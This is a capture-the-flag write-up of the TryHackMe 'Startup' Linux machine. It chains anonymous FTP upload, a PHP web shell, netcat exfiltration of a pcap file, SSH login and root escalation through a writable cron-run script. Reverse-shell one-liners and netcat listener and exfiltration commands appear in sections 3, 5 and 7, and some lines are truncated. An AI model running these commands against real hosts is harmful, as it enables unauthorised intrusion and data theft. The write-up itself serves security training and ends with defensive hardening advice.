Share
## https://sploitus.com/exploit?id=B3A2800E-43E2-55FC-BB1D-2FF6CDFF8EAF
# Startup โ€“ Professional Write-up

**Platform:** TryHackMe
**Target OS:** Linux
**Attack Vector:** Misconfigured FTP โ†’ Web Shell โ†’ Credential Harvesting โ†’ Privilege Escalation

---

## Executive Summary

This machine demonstrates a realistic attack chain starting from exposed services and weak configurations, leading to full system compromise.

The exploitation path involved:

* Anonymous FTP access with upload capability
* Web shell deployment via exposed web directory
* Credential discovery inside a PCAP file
* Lateral movement via SSH
* Privilege escalation through writable script executed with elevated privileges

The engagement highlights the importance of secure service configuration, credential protection, and proper permission management.

---

# 1. Reconnaissance & Enumeration

A full TCP port scan was conducted to identify exposed services:

```bash
nmap -p- -Pn -n --min-rate 5000 -T4 
```

Focused enumeration on discovered ports:

```bash
nmap -p21,22,80 -sSCV --min-rate 5000 -T4 
```

### Identified Services

| Port | Service | Observation                             |
| ---- | ------- | --------------------------------------- |
| 21   | FTP     | Anonymous login enabled                 |
| 22   | SSH     | OpenSSH service                         |
| 80   | HTTP    | Web server hosting accessible directory |

The presence of anonymous FTP access immediately expanded the attack surface.

---

# 2. Initial Access โ€“ Anonymous FTP Abuse

Connection to FTP:

```bash
ftp  21
Password: 
ls
mget *
```

Key findings:

* Publicly accessible files
* Upload capability confirmed

This misconfiguration allowed arbitrary file upload, enabling remote code execution via web server.

---

# 3. Web Shell Deployment

A simple PHP reverse shell was created:

```php
& /dev/tcp//4444 0>&1'");
?>
```

Upload process:

```bash
ftp  21
cd ftp
put shell.php
```

Listener setup:

```bash
nc -lvnp 4444
```

Shell execution via browser:

```
http:///files/ftp/shell.php
```

Result: **Remote shell as web server user.**

---

# 4. Post-Exploitation & Internal Enumeration

From the obtained shell:

```bash
cat recipe.txt
```

Following lab hints, an unusual directory was identified:

```bash
cd /home/incidents
ls -la
```

File discovered:

```
suspicious.pcapng
```

---

# 5. PCAP Analysis & Credential Extraction

The file was exfiltrated using netcat.

**Attacker machine:**

```bash
nc -lvnp 9001 > suspicious.pcapng
```

**Victim machine:**

```bash
nc  9001 
```

Successful login.

User flag obtained:

```bash
cd /home/lennie
cat user.txt
```

---

# 7. Privilege Escalation

Enumeration revealed a script:

```bash
cd /scripts
cat planner.sh
```

The script referenced:

```
/etc/print.sh
```

Permissions review:

```bash
ls -la /etc/print.sh
```

The file was writable and executed by a privileged process.

---

## Exploitation of Writable Script

Listener preparation:

```bash
nc -lvnp 5555
```

Payload injection:

```bash
echo "bash -i >& /dev/tcp//5555 0>&1" >> /etc/print.sh
```

When executed by the privileged process, a root shell was obtained.

Verification:

```bash
whoami
```

Output:

```
root
```

Final flag:

```bash
cd /root
cat root.txt
```

---

# Technical Impact Assessment

This machine demonstrates multiple real-world security failures:

### 1. Service Misconfiguration

* Anonymous FTP with write permissions

### 2. Remote Code Execution

* Uploading executable PHP shell into web-accessible directory

### 3. Credential Exposure

* Cleartext credentials stored in network capture

### 4. Privilege Escalation via Weak File Permissions

* Writable script executed by privileged process

---

# Key Skills Demonstrated

* Full TCP enumeration with Nmap
* Service misconfiguration analysis
* Web shell deployment
* Reverse shell handling
* Network traffic artifact analysis
* Credential harvesting
* SSH pivoting
* Linux privilege escalation
* Manual exploitation without automated frameworks

---

# Conclusion

The compromise of the Startup machine illustrates how chained low-to-medium severity misconfigurations can lead to full system takeover.

From a defensive perspective, this scenario reinforces:

* The necessity of disabling anonymous FTP
* Restricting upload directories
* Enforcing encrypted protocols (e.g., SSH/SFTP instead of FTP)
* Proper file permission hardening
* Monitoring abnormal script modifications

This exercise reflects a realistic attacker mindset and demonstrates structured methodology applicable to real-world penetration testing engagements.